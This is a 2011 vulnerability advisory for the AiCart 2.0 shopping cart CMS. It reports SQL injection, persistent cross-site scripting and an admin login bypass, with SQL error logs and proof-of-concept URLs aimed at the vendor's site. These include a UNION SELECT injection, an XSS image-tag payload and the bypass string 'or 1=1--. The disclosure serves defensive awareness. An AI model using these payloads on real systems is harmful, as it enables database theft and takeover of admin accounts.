AiCart 2.0 CMS - Multiple Critical Web Vulnerabilities

2011-06-21T00:00:00
ID VULNERLAB:203
Type vulnerlab
Reporter Vulnerability Research Laboratory
Modified 2011-06-21T00:00:00

Description

                                        
                                            Document Title:
===============
AiCart 2.0 CMS - Multiple Critical Web Vulnerabilities



Release Date:
=============
2011-06-21


Vulnerability Laboratory ID (VL-ID):
====================================
203


Product & Service Introduction:
===============================
AiCart shopping cart software is created in PHP and uses a simple template structure, makes it very flexible and 
easy to modify. The data in AiCart is stored in a MySQL database.AiCart is fully W3C-compliant with a CSS-based layout.
AiCart features a built-in Content Management System giving you the abity to easily manage and create unlimited web site 
pages with an easy to use online text editor. Best of all AiCart is search engine friendly. A merchant can specify meta 
tags for all pages and product and category pages are all stored using the relevent meta data which result in higher 
search engine rankings. AiWood Digital also offers custom programming services. Every client can get a storefront with 
a unique look fully customized to completely fit the style, image and structure of your business. AiCart is full 
compatable with PayPal and also features its own store merchant (credit card processing requires an SSL certificate for 
maximum security) as well as having the option to processoffline payments.

(Copy of the Vendor Homepage: http://www.aicart.ca/home)



Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered multiple SQL Injection & Cross Site Scripting Vulnerabilities on AiCart CMS v2.0.


Vulnerability Disclosure Timeline:
==================================
2011-06-20:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
Multiple SQL Injection Vulnerabilities are detected on the new AiCart Shopping CMS v2.0.
The vulnerability allows remote attacker (pre-auth) to inject own sql statements on the application dbms.

Vulnerable Module(s):
				[+] Add to Cart (Shop)
				[+] Sortby
				[+] TYPE_ID
				[+] ID



--- SQL Error Logs ---
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near  Limit 24, 24 at line 4
SQL Data: SELECT * from products WHERE bid = 2 AND status = 1 ORDER BY -1 Limit 24, 24
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 50

SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near  order by 1--, NOW()) at line 1
SQL Data: INSERT into basket (cartid, uid, pid, quantity, date) values (5669fc809f48dff557fb50bee3ab472d-1308462112,
2, 2, order by 1--, NOW()) 
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 43

SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for 
the right syntax to use near at line 1
SQL Data: SELECT * from product_brands WHERE lname = -1;
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 50


SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near , NOW()) at line 1
SQL Data: INSERT into basket (cartid, pid, quantity, date) values (38314720c60f05f218b581bad46caed0-1308461139, 2, -1, NOW())
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 43 


1.2
A persistent Input Validation Vulnerability is detected on the ajax module on the pager param request.
The vulnerability allows an remote attacker to implemente malicious persistent script code on application-side.
The successfully exploitation of the bug allows an attacker to hijack the admin/customer sessions(accounts) or 
can lead to contest request manipulation.

Vulnerable Module(s):
				[+] Ajax - Pager
				[+] Credit Name
				[+] Rating
				[+] Search


1.3
An Auth Bypass Vulnerability is detected on the admin login form of the AiCart Admin Interface.
The bug allows an atttacker to bypass the auth to the admin panel.


Pictures:
				../1.png
				../1.jpg
				../2.jpg
				../3.jpg
				../4.jpg
				../5.jpg
				../6.jpg


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ...

1.1
SQL Reference:
http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=1&sortby=-1%27&where_id=&type_id=Nikon
http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=0&sortby=&where_id=&type_id=-1%27
http://www.aicart.ca/store?action=orders&id=-3+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

1.2
XSS Reference:
http://www.aicart.ca/templates/ajax/pager.php?type=reviews&page=0&sortby=&where_id=pid%20=%202&pager_id=
http://www.aicart.ca/search?searchstring=%22%3E%3Cimg%20src=%22http://gallery.7bna.com/data/media/50/injection.jpg%22%3E&x=0&y=0


1.3
Auth Bypass:
http://www.aicart.ca/v3/admin/SQL%20Error:%20You%20have%20an%20error%20in%20your%20SQL%20syntax;%20check%20the%20manual%20that%20corresponds%20to%20your%20MySQL%20server%20version%20for%20the%20right%20syntax%20to%20use%20near%20'8ce3f2de6a1e527b7e2b0c81807743e9''%20at%20line%201%3Cbr%20/%3ESQL%20Data:%20SELECT%20*%20from%20users_admin%20where%20email%20=%20''%20or%201=1--'%20AND%20password%20=%20'8ce3f2de6a1e527b7e2b0c81807743e9'%3Cbr%20/%3EFile:%20/home/aicart/public_html/v3/includes/class.sql_db.php%3Cbr%20/%3ELine:%20500/admin

String: 'or 1=1--


Security Risk:
==============
1.1
The security risk of the multiple sql injection vulnerabilities are estimated as critical.
1.2
The security risk of the multiple cross site scripting vulnerabilities are estimated as medium.
1.3
The security risk of the auth bypass vulnerability is estimated as critical.



Credits & Authors:
==================
Vulnerability Research Laboratory


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory